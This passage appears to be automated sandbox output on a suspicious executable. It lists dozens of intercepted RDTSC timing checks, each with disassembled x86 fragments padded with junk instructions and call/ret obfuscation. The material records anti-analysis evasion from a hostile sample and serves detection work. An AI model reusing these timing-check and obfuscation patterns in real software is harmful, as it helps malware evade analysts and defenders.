            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3240 second address: DE3244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7B50 second address: DE7B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE71D8 second address: DE71ED instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF9ACE94096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE71ED second address: DE71F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBBC second address: DEBBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBC6 second address: DEBBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF9ACEA228Dh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF9ACEA2298h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBBFB second address: DEBC18 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF9ACE9409Ch 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBC18 second address: DEBC1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED196 second address: DED1B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FF9ACE94096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FF9ACE940A1h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED1B3 second address: DED1BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF9ACEA228Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED1BD second address: DED1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE940A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACE9409Bh 0x00000013 jne 00007FF9ACE94096h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47B8 second address: DF47BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47BE second address: DF47D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ebx 0x00000007 jng 00007FF9ACE9409Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FF9ACE94096h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47D9 second address: DF47DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EA1C second address: D7EA26 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF9ACE9409Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF34EC second address: DF34F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A4D second address: DF3A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A53 second address: DF3A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF9ACEA2286h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A5E second address: DF3A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A0h 0x00000007 push ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3F11 second address: DF3F54 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF9ACEA2292h 0x00000008 jmp 00007FF9ACEA2294h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF9ACEA2297h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF430D second address: DF4313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4313 second address: DF4324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF9ACEA2286h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4324 second address: DF433E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007FF9ACE94096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FF9ACE94096h 0x00000014 jp 00007FF9ACE94096h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF433E second address: DF4342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4342 second address: DF4348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9C85 second address: DF9C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3B4 second address: D7B3D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACE94096h 0x00000008 js 00007FF9ACE94096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 js 00007FF9ACE940B4h 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jo 00007FF9ACE94096h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3D6 second address: D7B3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B3DC second address: D7B3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B04 second address: DF8B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8B08 second address: DF8B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF90A2 second address: DF90A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF90A6 second address: DF90AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8803 second address: DF8808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF95CA second address: DF95D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9704 second address: DF970A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03E38 second address: E03E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A83 second address: E02A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A89 second address: E02A93 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02BF9 second address: E02BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02BFF second address: E02C05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02D61 second address: E02D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02D6C second address: E02D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032DA second address: E032DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032DE second address: E032E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E036C5 second address: E036C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03831 second address: E03835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03835 second address: E0383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0383B second address: E03841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03841 second address: E03847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03847 second address: E03858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03CC8 second address: E03CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF9ACEA2286h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03CD7 second address: E03CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08756 second address: E0875A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0875A second address: E08760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075F7 second address: E07600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E11 second address: DC9E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF9ACE940A3h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FF9ACE94098h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D36BFh] 0x0000002d lea eax, dword ptr [ebp+12490BA8h] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF9ACE94098h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d add edx, dword ptr [ebp+122D38B3h] 0x00000053 nop 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9E85 second address: DA9A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a js 00007FF9ACEA2286h 0x00000010 je 00007FF9ACEA2286h 0x00000016 popad 0x00000017 pop ecx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FF9ACEA2288h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dh, F5h 0x00000035 call dword ptr [ebp+122D26FAh] 0x0000003b pushad 0x0000003c jp 00007FF9ACEA2288h 0x00000042 pushad 0x00000043 popad 0x00000044 jl 00007FF9ACEA2288h 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d jc 00007FF9ACEA22B0h 0x00000053 pushad 0x00000054 jns 00007FF9ACEA2286h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA431 second address: DCA446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jnl 00007FF9ACE94096h 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA446 second address: DCA46C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF9ACEA228Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FF9ACEA228Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA6F9 second address: DCA6FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCABC0 second address: DCABFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push 0000001Eh 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FF9ACEA2288h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D21C5h], edx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007FF9ACEA228Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCABFF second address: DCAC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAD52 second address: DCAD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF9ACEA2286h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAD5C second address: DCAD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAFA1 second address: DCAFAB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAFAB second address: DCB045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF9ACE94098h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D18D2h], esi 0x0000002a lea eax, dword ptr [ebp+12490BECh] 0x00000030 mov dword ptr [ebp+122D2600h], ecx 0x00000036 push eax 0x00000037 jmp 00007FF9ACE940A0h 0x0000003c mov dword ptr [esp], eax 0x0000003f jg 00007FF9ACE94096h 0x00000045 lea eax, dword ptr [ebp+12490BA8h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FF9ACE94098h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000016h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007FF9ACE94098h 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB045 second address: DCB04A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB04A second address: DAA5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop ecx 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FF9ACE94098h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xor dword ptr [ebp+12474D84h], edx 0x00000031 call dword ptr [ebp+122D35F4h] 0x00000037 pushad 0x00000038 jmp 00007FF9ACE940A6h 0x0000003d ja 00007FF9ACE94098h 0x00000043 pushad 0x00000044 jmp 00007FF9ACE940A7h 0x00000049 pushad 0x0000004a popad 0x0000004b push edx 0x0000004c pop edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07922 second address: E07926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07926 second address: E07935 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07935 second address: E0793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF9ACEA2286h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0803B second address: E08040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E082BE second address: E082C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E082C2 second address: E082DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF9ACE940A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B519 second address: E0B531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2293h 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B531 second address: E0B53E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B53E second address: E0B543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E50D second address: E0E511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E511 second address: E0E517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD46 second address: E0DD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD5C second address: E0DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD60 second address: E0DD6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF9ACE94096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD6A second address: E0DD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD70 second address: E0DD7D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF9ACE94098h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD7D second address: E0DD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DEC0 second address: E0DEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E071 second address: E0E077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1B2 second address: E0E1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF9ACE94096h 0x0000000a jmp 00007FF9ACE940A2h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1D3 second address: E0E1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1D9 second address: E0E1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1DF second address: E0E1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
